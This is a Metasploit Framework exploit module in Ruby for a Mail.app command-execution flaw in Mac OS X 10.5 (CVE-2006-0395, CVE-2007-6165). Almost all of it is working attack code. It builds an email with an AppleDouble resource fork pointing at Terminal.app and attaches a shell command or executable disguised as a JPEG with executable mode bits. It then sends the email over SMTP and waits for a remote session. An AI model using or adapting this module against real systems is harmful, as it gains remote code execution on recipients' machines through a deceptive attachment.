Mail.app Image Attachment Command Execution



##

# $Id: mailapp_image_exec.rb 10397 2010-09-20 15:59:46Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = ManualRanking

    #
    # This module sends email messages via smtp
    #
    include Msf::Exploit::Remote::SMTPDeliver
    include Msf::Exploit::EXE

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Mail.app Image Attachment Command Execution',
            'Description'    => %q{
                    This module exploits a command execution vulnerability in the
                Mail.app application shipped with Mac OS X 10.5.0. This flaw was
                patched in 10.4 in March of 2007, but reintroduced into the final
                release of 10.5.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>  ['hdm', 'kf'],
            'Version'        => '$Revision: 10397 $',
            'References'     =>
                [
                    ['CVE', '2006-0395'],
                    ['CVE', '2007-6165'],
                    ['OSVDB', '40875'],
                    ['BID', '26510'],
                    ['BID', '16907']
                ],
            'Stance'         => Msf::Exploit::Stance::Passive,
            'Payload'        =>
                {
                    'Space'       => 8192,
                    'DisableNops' => true,
                    'BadChars'    => "",
                    'Compat'      =>
                        {
                            'ConnectionType' => '-bind -find',
                        },
                },

            'Targets'        =>
                [
                    [ 'Mail.app - Command Payloads',
                        {
                            'Platform'       => 'unix',
                            'Arch'           => ARCH_CMD,
                            'PayloadCompat' => {
                                'RequiredCmd'    => 'generic perl ruby bash telnet',
                            }
                        }
                    ],
                    [ 'Mail.app - Binary Payloads (x86)',
                        {
                            'Platform'       => 'osx',
                            'Arch'           => ARCH_X86,
                        }
                    ],
                    [ 'Mail.app - Binary Payloads (ppc)',
                        {
                            'Platform'       => 'osx',
                            'Arch'           => ARCH_PPC,
                        }
                    ],
                ],
            'DisclosureDate' => 'Mar 01 2006'
            ))

    end

    def autofilter
        false
    end

    def exploit

        exts = ['jpg']

        gext = exts[rand(exts.length)]
        name = rand_text_alpha(5) + ".#{gext}"
        data = rand_text_alpha(rand(32)+1)

        msg = Rex::MIME::Message.new
        msg.mime_defaults
        msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1)
        msg.to = datastore['MAILTO']
        msg.from = datastore['MAILFROM']

        dbl = Rex::MIME::Message.new
        dbl.header.set("Content-Type", "multipart/appledouble;\r\n    boundary=#{dbl.bound}")
        dbl.header.set("Content-Disposition", "inline")

        # AppleDouble file version 2
        # 3 entries - 'Finder Info', 'Real name', 'Resource Fork'
        # Real Name matches msf random generated 5 character name - (I cheated ala gsub)

        resfork =
        "AAUWBwACAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAJAAAAPgAAAAoAAAADAAAASAAAAAkAAAACAAAA\r\n" +
        "UQAABToAAAAAAAAAAAAASGVpc2UuanBnAAABAAAABQgAAAQIAAAAMgAAAAAAAAAAAAAAAAAAAAAA\r\n" +
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQA\r\n" +
        "AAAlL0FwcGxpY2F0aW9ucy9VdGlsaXRpZXMvVGVybWluYWwuYXBwAOzs7P/s7Oz/7Ozs/+zs7P/s\r\n" +
        "7Oz/7Ozs/+Hh4f/h4eH/4eHh/+Hh4f/h4eH/4eHh/+Hh4f/h4eH/5ubm/+bm5v/m5ub/5ubm/+bm\r\n" +
        "5v/m5ub/5ubm/+bm5v/p6en/6enp/+np6f/p6en/6enp/+np6f/p6en/6enp/+zs7P/s7Oz/7Ozs\r\n" +
        "/+zs7P/s7Oz/7Ozs/+zs7P/s7Oz/7+/v/+/v7//v7+//7+/v/+/v7//v7+//7+/v/+/v7//z8/P/\r\n" +
        "8/Pz//Pz8//z8/P/8/Pz//Pz8//z8/P/8/Pz//b29v/29vb/9vb2//b29v/29vb/9vb2//b29v/2\r\n" +
        "9vb/+Pj4//j4+P/4+Pj/+Pj4//j4+P/4+Pj/+Pj4//j4+P/8/Pz//Pz8//z8/P/8/Pz//Pz8//z8\r\n" +
        "/P/8/Pz//Pz8////////////////////////////////////////////////////////////////\r\n" +
        "/////////////////////6gAAACoAAAAqAAAAKgAAACoAAAAqAAAAKgAAACoAAAAKgAAACoAAAAq\r\n" +
        "AAAAKgAAACoAAAAqAAAAKgAAACoAAAADAAAAAwAAAAMAAAADAAAAAwAAAAMAAAADAAAAAwAAAAAA\r\n" +
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
        "AAAAAQAAAAUIAAAECAAAADIAX9CsEsIAAAAcADIAAHVzcm8AAAAKAAD//wAAAAABDSF8" + "\r\n"

        fork = Rex::Text.encode_base64( Rex::Text.decode_base64(resfork).gsub("Heise.jpg",name), "\r\n" )

        cid = "<#{rand_text_alpha(rand(16)+16)}@#{rand_text_alpha(rand(16)+1)}.com>"

        cmd = ''

        if (target.arch.include?(ARCH_CMD))
            cmd = Rex::Text.encode_base64(payload.encoded, "\r\n")
        else
            bin = generate_payload_exe
            cmd = Rex::Text.encode_base64(bin, "\r\n")
        end


        dbl.add_part(fork , "application/applefile;\r\n    name=\"#{name}\"", "base64", "inline;\r\n    filename=#{name}" )
        dbl.add_part(cmd , "image/jpeg;\r\n    x-mac-type=0;\r\n    x-unix-mode=0755;\r\n    x-mac-creator=0;\r\n    name=\"#{name}\"", "base64\r\nContent-Id: #{cid}", "inline;\r\n    filename=#{name}" )

        msg.parts << dbl

        send_message(msg.to_s)

        print_status("Waiting for a payload session (backgrounding)...")
    end

end